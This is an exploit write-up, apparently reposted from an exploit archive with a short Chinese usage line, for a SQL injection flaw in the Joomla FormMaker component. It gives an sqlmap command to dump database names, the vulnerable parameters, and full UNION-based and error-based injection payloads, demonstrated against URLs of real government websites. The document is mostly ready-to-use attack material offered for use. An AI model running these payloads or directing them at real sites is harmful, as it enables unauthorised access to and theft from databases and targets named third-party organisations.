使用说明:
python sqlmap.py -u "http://localhost/index.php?option=com_formmaker&view=formmaker&id=-5653&Itemid=45" --dbs
###################################################################### # Exploit Title: Joomla FormMaker Component - SQL Injection Vulnerability # Google Dork: Y0ur Brain # Date: 28.03.2015 # Exploit Author: CrashBandicot (@DosPerl) # Vendor HomePage: http://extensions.joomla.org/extension/form-maker # Tested on: Windows ###################################################################### # Exploit : index.php?option=com_formmaker&view=formmaker&id=-5653 {SQLi}&Itemid=45 # index.php?option=com_formmaker&task=paypal_info&tmpl=component&id=-1 {SQLi} # ~ Demo ~ # $> # Example : # Type: MySQL UNION query (NULL) - with 28 columns # URI: http://www.cabinet.gov.zm/index.php?option=com_formmaker&view=formmaker&id=-5653 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x7170707671,IFNULL(CAST(database() AS CHAR),0x20),0x71767a7071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&Itemid=45 # Other Example : # Type: error-based # URI: http://www.ppsppa.gov.my/index.php/ms/?option=com_formmaker&view=formmaker&id=1 AND (SELECT 4784 FROM(SELECT COUNT(*),CONCAT(0x7170767671,(MID((IFNULL(CAST(database() AS CHAR),0x20)),1,50)),0x71706b6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&Itemid=837 # sh00t5 To SQL_master :D
评论 (0)